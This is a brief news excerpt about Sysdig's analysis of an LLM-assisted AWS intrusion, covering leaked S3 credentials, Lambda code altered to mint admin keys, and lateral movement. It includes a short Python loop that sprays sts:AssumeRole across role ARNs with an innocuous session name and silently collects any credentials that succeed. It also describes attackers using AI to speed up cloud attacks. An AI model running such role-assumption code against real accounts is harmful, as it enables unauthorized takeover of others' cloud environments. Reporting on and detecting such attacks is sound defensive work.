Attackers exploit LLMs to gain admin rights in AWS
"Security researchers at Sysdig warn that attackers can quickly take over AWS environments using large language models. Their latest analysis shows that AI is already being used to automate cloud attacks, accelerate them, and make them harder to detect. The Sysdig Threat Research Team bases these conclusions on an attack that began on November 28, 2025. In this case, an attacker gained initial access and escalated to full administrator rights within an AWS account in less than ten minutes."
"The attack began with login credentials left in publicly accessible S3 buckets. These buckets contained RAG data for AI models and were linked to an IAM user with sufficient Lambda permissions to be exploited. The attacker used those rights to modify the code of an existing Lambda function. The new code generated access keys for an admin user and returned them directly via the Lambda response."
The malicious code contained Serbian-language comments and unusually extensive error handling, which Sysdig cites as evidence of LLM involvement. Because the Lambda execution role held broad permissions, the attacker acquired administrative privileges indirectly, without a classic IAM privilege-escalation chain. From there, the attacker moved laterally across nineteen AWS principals, created new access keys and an additional admin user for persistence, and attempted role assumptions in other accounts.
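The cross-account role-assumption attempts can be sketched as a simple loop over candidate role ARNs, swallowing `AccessDenied` failures and collecting any credentials that succeed. This is a hedged illustration of the technique; the function name, ARNs, and injected STS client are assumptions, not details from the report.

```python
def try_assume_roles(sts_client, role_arns):
    """Attempt sts:AssumeRole against each ARN, keeping what works."""
    stolen = {}
    for arn in role_arns:
        try:
            resp = sts_client.assume_role(
                RoleArn=arn,
                RoleSessionName="audit",  # innocuous-looking session name
            )
            stolen[arn] = resp["Credentials"]
        except Exception:
            # AccessDenied and similar errors: move on to the next principal.
            continue
    return stolen
```

Monitoring for bursts of failed `AssumeRole` calls in CloudTrail is one way this kind of spray across principals can be detected.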
Read at Techzine Global